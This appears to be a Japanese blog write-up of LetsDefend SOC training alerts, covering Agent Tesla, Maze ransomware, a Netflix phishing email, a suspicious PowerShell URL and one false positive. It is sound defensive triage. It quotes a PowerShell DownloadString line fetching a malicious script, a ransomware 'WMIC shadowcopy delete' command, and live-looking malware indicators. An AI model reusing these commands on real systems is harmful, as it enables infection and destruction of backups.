LetsDefend level 1 alert SOC104 - Malware Detected event-id 31
Details
EventID: 31
Event Time: Oct. 29, 2020, 7:55 p.m.
Rule: SOC104 - Malware Detected
Level: Security Analyst
Source Address 172.16.17.82
Source Hostname JohnComputer
File Name Purchase-Order_NO.231101.exe
File Hash cdde99520664ac313d43964620019c61
File Size 616.50 KB
Device Action Allowed
Download (Password:infected): cdde99520664ac313d43964620019c61.zip
playbook
Define Threat Indicator
Answer:Other
Check if the malware is quarantined/cleaned
Answer:Not Quarantined
Analyze Malware
cdde99520664ac313d43964620019c61
VirusTotal 59/71: https://www.virustotal.com/gui/file/40618ab352c23e61bb192f2aedd9360fed2df2a25d42491d0ab56eda5c2db558/details
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/40618ab352c23e61bb192f2aedd9360fed2df2a25d42491d0ab56eda5c2db558/5f9b6efb6bd0564272401a5f
ここまで真っ赤であるならばMaliciousのハズだ。VirusTotalのレポートには、AgentTeslaの文字列が。
Agent Tesla Malware Analysis, Overview by ANY.RUN
動作を見ると、
ANYRUN: https://app.any.run/tasks/a9037684-a6b1-4402-b97b-7fbdcf94e26c/
色々なブラウザやメーラーのデータを探したり、自動起動の設定をしている。機能としてはAgentTeslaのようにも見える。
Endpoint - JohnComputer
Process History
cdde99520664ac313d43964620019c61が、しっかり実行されている。
Purchase-Order_NO.231101.exe MD5:cdde99520664ac313d43964620019c61 Size:616.50 KB Path:c:/Users/John/Downloads/Purchase-Order_NO.231101.exe
Logsearch
# | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
---|---|---|---|---|---|---|
Oct, 29, 2020, 08:06 PM | Firewall | 172.16.17.82 | 49758 | 208.91.199.223 | 587 |
アラートが上がった後に近い時間にログに残っているアクセスは、
VirusTotalやANYRUNでマルウェアの実行時にアクセスされていた「smtp.japhethpumps[.]com」かと思っていたが、
違った。
208.91.199.223 -> smtp.nmb[.]us
Reverse IP Lookup - ViewDNS.info
ただ、VirusTotal等で確認してみるとベンダーには登録されていないものの、
VirusTotal: https://www.virustotal.com/gui/ip-address/208.91.199.223/details
いくつかマルウェアと関連を示唆するようなレポートが多いIPのようだ。
Answer:Malicious
Check If Someone Requested the C2
通信の中身は確認できていないが、VirusTotalのレポートにあるようにマルウェアの実行後に587へのアクセスが確認された。
Answer:Accessed
Containment
Containment!
Add Artifacts
Value | Type | Comment |
---|---|---|
cdde99520664ac313d43964620019c61 | MD5 Hash | malware - agenttesla? |
208.91.199.223 | IP Address | C2 server. smtp.nmb[.]us |
True Positive.
End
LetsDefend level 1 alert SOC102 - Proxy - Suspicious URL Detected event-id 32
Details
EventID: 32
Event Time: Dec. 1, 2020, 5:50 a.m.
Rule: SOC102 - Proxy - Suspicious URL Detected
Level: Security Analyst
Source Address 172.148.17.14
Source Hostname MikeComputer
Destination Address 172.217.17.174
Destination Hostname encrypted-tbn0.gstatic.com
Username Mike01
Request URL https[:]//encrypted-tbn0.gstatic[.]com/images?q=tbn:ANd9GcSjESkzn2LUxELhnqZZWBbmGwtbqfFsaemB9w&usqp=CAU
User Agent Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1
Device Action Blocked
playbook
Search Log
# | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
---|---|---|---|---|---|---|
Dec, 01, 2020, 05:58 AM | Proxy | 172.148.17.14 | 48193 | 172.217.17.174 | 443 |
Request URL: https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSjESkzn2LUxELhnqZZWBbmGwtbqfFsaemB9w&usqp=CAU Request Method: GET Device Action: Blocked Process: chrome.exe Parent Process: explorer.exe Parent Process MD5: 8b88ebbb05a0e56b7dcc708498c02b3e
同サーバのアクセスは、アラート時のもののみを確認された。
Endpointを見ると、気になるdocファイルの実行が見られたが今回のものとは関係無さそうなので一旦置いておく。
このサーバへのアクセスはアラート時のもののみ。
Analyze URL Address
https[:]//encrypted-tbn0.gstatic[.]com/images?q=tbn:ANd9GcSjESkzn2LUxELhnqZZWBbmGwtbqfFsaemB9w&usqp=CAU
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/aa243e9bc80b1d466a8d3e9f1d2a285b8445f47bb173835ad1066aa8ebf63675/61e30b6bb545d72fa270b2c3
実際にアクセスしてみると、何かの画像であった。
そもそも、gstatic[.]comとは
gstatic.comは何に使用されますか?あなたが知る必要があるすべて! - JA Atsit
What is gstatic.com used for? All you need to know!
公式の文言が見つからなかったが、Googleの画像キャッシュサーバのようだ。無知でした。
そうであるならば、今回のURLは問題ないと言えるのではないだろうか。
一応、ドメインやIPも。
encrypted-tbn0.gstatic[.]com
VirusTotal: https://www.virustotal.com/gui/domain/encrypted-tbn0.gstatic.com/community
いくらかコメントがあるが、時と場合によっては怪しい画像へリンクされたためだろうか。
172.217.17.174
VirusTotal: https://www.virustotal.com/gui/ip-address/172.217.17.174/community
googleであると。
以上から
Answer:Non-malicious
Add Artifacts
Value | Type | Comment |
---|---|---|
https[:]//encrypted-tbn0.gstatic[.]com/images?q=tbn:ANd9GcSjESkzn2LUxELhnqZZWBbmGwtbqfFsaemB9w&usqp=CAU | URL Address | Google's image cache |
172.217.17.174 | IP Address | Google's image cache server |
False Positive.
End
今回は誤検知であったという結果になったが、そもそも誤検知となった理由があるはずである。それは、単純にルールのミスなのか過去にencrypted-tbn0.gstatic.comへのアクセスが悪用されたのか分からないが、この理由をはっきりさせなければ今後の検知精度向上には繋がらない。
LetsDefend level 1 alert SOC104 - Malware Detected event-id 36
Details
EventID: 36
Event Time: Dec. 1, 2020, 10:23 a.m.
Rule: SOC104 - Malware Detected
Level: Security Analyst
Source Address 10.15.15.18
Source Hostname AdamPRD
File Name Invoice.exe
File Hash f83fb9ce6a83da58b20685c1d7e1e546
File Size 473.00 KB
Device Action Allowed
Download (Password:infected): f83fb9ce6a83da58b20685c1d7e1e546.zip
playbook
Define Threat Indicator
Answer:Other
Check if the malware is quarantined/cleaned
Answer:Not Quarantined
Analyze Malware
f83fb9ce6a83da58b20685c1d7e1e546
VirusTotal 59/70: https://www.virustotal.com/gui/file/e8a091a84dd2ea7ee429135ff48e9f48f7787637ccb79f6c3eb42f34588bc684
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/e8a091a84dd2ea7ee429135ff48e9f48f7787637ccb79f6c3eb42f34588bc684/5fcd31635d0d89567317ef92
VirusTotalの結果がここまで真っ赤なのであればマルウェアであることには間違いなさそうだ。VirusTotalのレポートには、92.63.X.Xへのアクセスが多いこととmazeの名前が見られる。
Hybrid-Analysisのレポートには、
Deletes volume snapshots (often used by ransomware) - details Deletes volume snapshots files "WMIC.exe" with commandline "shadowcopy delete"
とある。これは実は知らなかったのだが、ランサムウェアはバックアップもちゃんと消した上でランサムするのですね。
ANYRUN: https://app.any.run/tasks/9f011389-db62-4de7-8d26-9bc04cec2534/
実行すると、ファイルを書き換え、Firefoxのデータを取得したり、バックアップを消す。
ANYRUNからmazeランサムウェアであることが分かった。
Maze Malware Analysis, Overview by ANY.RUN
Maze creators revealed that after infecting the initial endpoint, their ransomware targets cloud backups by laterally spreading through the network and stealing needed credentials.
バックアップをとことん削除まで狙うのはmazeの特徴なのだろうか。
さて、肝心のマルウェアだがexeファイルの解析は未だほとんどできないので今後に期待いただきたい。
Log Search
先ほど上がったC2サーバ92.63.X.Xへのアクセスはあるかを確認すると、
# | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
---|---|---|---|---|---|---|
Dec, 01, 2020, 10:30 AM | Proxy | 10.15.15.18 | 49832 | 92.63.8.47 | 443 |
URL: http://92.63.8.47/
これは実行されていそうだ。Endpointにログが見つからないが実行されたと判断して良さそうだ。
92.63.8.47
VirusTotal: https://www.virustotal.com/gui/ip-address/92.63.8.47/detection
ip-sc : https://ip-sc.net/ja/r/92.63.8.47
アクセス先はトルコのサーバである。MAZE.
Answer:Malicious
Check If Someone Requested the C2
先にアクセス確認済み。
Answer:Accessed
Containment
Containment!
Add Artifacts
Value | Type | Comment |
---|---|---|
f83fb9ce6a83da58b20685c1d7e1e546 | MD5 Hash | maze ransomware |
92.63.8.47 | IP Address | maze ransomware C2 |
10.15.15.18 | IP Address | infected |
True Positive.
End
今回のようなケースだと、ランサムウェアなので感染端末に分かりやすく影響があるために相談を受けてから調査が始まるような場合が多いように思えるが、もしかすると企業であれば個人が自身の失態を隠そうとして報告せずにアラートから調査が始まるようなケースもあるのだろうか。
LetsDefend level 1 alert SOC101 - Phishing Mail Detected event-id 34
Details
EventID: 34
Event Time: Dec. 5, 2020, 10:33 p.m.
Rule: SOC101 - Phishing Mail Detected
Level: Security Analyst
SMTP Address 112.85.42.180
Source Address admin@netflix-payments.com
Destination Address emily@letsdefend.io
E-mail Subject Netflix Deals!
Device Action Allowed
playbook
E-mail Subject: Netflix Deals! From: admin@netflix-payments.com admin@netflix-payments.com Dec. 5, 2020, 10:33 p.m. -> To: emily@letsdefend.io emily@letsdefend.io Dec. 5, 2020, 10:33 p.m. Hey, Register now and get 2 months free membership! http://bit.ly/3ecXem52 Netflix.
Are there attachments or URLs in the email?
Answer:Yes
Analyze Url/Attachment
http[:]//bit.ly/3ecXem52
リンク先の確認を行う。
とりあえずのところ、現在はリンク先を確認できない。
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/3be0a7d94496ea7176e45463e09429f856a0f5cf2321c5378c363439a94b3921/5fcf987e5b15c81b920f89c9
Malicious Indicatorsがあるがbit.lyに対してである。よくよくスクリーンショット見てみると、リンク先が確認できている訳ではなさそうだ。
netflix-payments.com
送信元ドメインを調査する。
VirusTotal: https://www.virustotal.com/gui/domain/netflix-payments.com
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/e7197871d3093a8c017544dd0cffcac5c457b581d400bc286a2f55949d278994?environmentId=120
過去にはVirusTotalで3/79というレポートがある。リンク先の内容はこちらでも確認できない。
ViewDNS whois: https://viewdns.info/whois/?domain=netflix-payments.com
そもそも、ドメインレジストラを使っていたりNetflixと関係は無さそうで怪しい。
112.85.42.180
送信元のIPを調査する。
VirusTotal: https://www.virustotal.com/gui/ip-address/112.85.42.180
AbuseIPDB: https://www.abuseipdb.com/check/112.85.42.180
ip-sc: https://ip-sc.net/ja/r/112.85.42.180
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/004e716bb3c39e8f56a9a468e3db239410685b7d2f8eb97d07f9fc89adffb465?environmentId=120
SSH bruteforce attack元であるというレポートが複数確認された。
過去にはVirusTotalで7/73というレポートがある。
これはMaliciousであると判断する。
Answer:Malicious
Check If Mail Delivered to User?
Device Action Allowed
Answer:Delivered
Check If Someone Opened the Malicios File/URL?
Log Searchにはhttp[:]//bit.ly/3ecXem52へのアクセスを確認されず。
Answer:Not Opened
Add Artifacts
Value | Type | Comment |
---|---|---|
admin@netflix-payments.com | E-mail Sender | |
netflix-payments.com | E-mail Domain | godaddy - domain reristrar |
http[:]//bit.ly/3ecXem52 | URL Address | |
112.85.42.180 | IP Address | VirusTotal - 7/73. SSH bruteforce attack IP. |
True Positive.
End
ログに無かったためにhttp[:]//bit.ly/3ecXem52へアクセスしていないと考えたが違ったようだ。
Endpointを確認してみると、
Browser History 2020-12-05 14:13: https://github.com/SecurityRiskAdvisors/VECTR/blob/master/VECTREndUserLicenseAgreement.pdf 2020-12-05 14:14: https://github.com/SecurityRiskAdvisors 2020-12-05 14:15: https://github.com/SecurityRiskAdvisors/VECTR 2020-12-05 14:16: https://github.com/SecurityRiskAdvisors/VECTR/blob/master/README.md 2020-12-05 22:13: http://bit.ly/3ecXem52 2020-12-05 22:15: http://places.hayatistanbul.net/wp-content/themes/Netflix
確かにアクセスしている。今後は何らかの要因でログに記録されないことも見据えて、ログだけでなくEndpointの調査を必要そうだ。
さらに言えば、wordpressのNetFlixテーマ?にアクセスしているのも気になるが、このURLだけではほとんど情報が確認できないため今回はこの調査は見送る。
LetsDefend level 1 alert SOC102 - Proxy - Suspicious URL Detected event-id 35
Details
EventID: 35
Event Time: Dec. 6, 2020, 1:33 p.m.
Rule: SOC102 - Proxy - Suspicious URL Detected
Level: Security Analyst
Source Address 172.16.17.51
Source Hostname Aldo
Destination Address 66.198.240.56
Destination Hostname interalliance.org
Username aldo
Request URL https[:]//interalliance.org/come2/holme/folde/swiftcopy.ps1
User Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Device Action Allowed
playbook
Search Log
ログを見ると、interalliance[.]orgへのアクセスは残っていなかった。
Analyze URL Address
66.198.240.56
VirusTotal: https://www.virustotal.com/gui/ip-address/66.198.240.56/community
ip-sc: https://ip-sc.net/ja/r/66.198.240.56
VirusTotalにはMalicious判定は無いが、emotetとの関連があるようなレポートがある。
サーバはA2 Hostingらしい。
Best Web Hosting Services | A2 Hosting
http[:]//interalliance.org/
urlscan.io: https://urlscan.io/result/e65360fc-bbe4-43bb-8393-c93451b9e959/#summary
何かしらのWebサイトが動いていたようだ。
https[:]//interalliance.org/come2/holme/folde/swiftcopy.ps1
urlscan.io: https://urlscan.io/result/7d839378-54a9-45ae-a79e-24d89b63a9de/
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/c1b519da6034a9abbe2dd29cf51245be5831567b69788002cf66b4d5deb15493/5fcdac5f92d302697315038f
VirusTotal: https://www.virustotal.com/gui/url/dac6a8c1990738cf7ab5e74ef3ba7ed3075640a374be80804db42e5ce1cd53e2/detection
VirusTotalの結果は最近のアクセスで404になっているためにMalicious判定されていないが、Hybrid-Analysisの過去の解析の結果ではアクセスできたために?Maliciousとなっている。
interalliance[.]orgは異なる二つのIPがある。アラートで上がっていた66.198.240.56はウェブホスティングサービスのA2 HostingのIPだが、swiftcopy.ps1へのアクセスをurlscanで見ると35.209.19.126というGoogle CloudのIPとなっている。
このため、swiftcopy.ps1は偽サイトで配布されているのでは。
このサイトはwordpressに関連しそうな文字列が見受けられるために、wordpressの脆弱性を用いて乗っ取られたことも考えられる。
例えば、
https://interalliance.org/wp-content/uploads/
このようなURLがHTTPのresponseから見られる。
swiftcopy.ps1が取得できなかったために、これ以上の解析はできない。
明らかに、このサイトは怪しい動作をしているかつ.ps1ということはpowershellスクリプトを配布しているのも怪しい。
Answer: Malicious
Has Anyone Accessed IP/URL/Domain?
アラートが上がっているので今回のURLにアクセスしている。
Answer: Accessed
Containment
Endpoint - Aldo(172.16.17.51)
Process History
(snip) .DownloadString('https://interalliance.org/come2/holme/folde/swiftcopy.ps1');s $tc
今回のアラートの引き金になったSuspicious URLへのアクセスはpoweshellスクリプトが引き金になっている。
このスクリプトを全て載せるとアンチウイルスソフトに止められて記事編集ページに飛べなくなってしまったので省略。
CMD History
06.12.2020 12:18: tasklist 06.12.2020 12:19: net user 06.12.2020 12:20: net user aldo 06.12.2020 12:21: ping 172.16.20.3 06.12.2020 12:22: shutdown -r
今回のアラートの前に何かコマンドが動いている。
Add Artifacts
Value | Type | Comment |
---|---|---|
66.198.240.56 | IP Address | interalliance.org |
https[:]//interalliance.org/come2/holme/folde/swiftcopy.ps1 | URL Address | A file distributed from a fake website? |
True Positiveを選択した。
End
今回は怪しいURL先を確認できないために獲得可能な情報からだけだと、推測に推測を重ねることで判断が必要なアラートであった。
アラートは早めに対処すべき。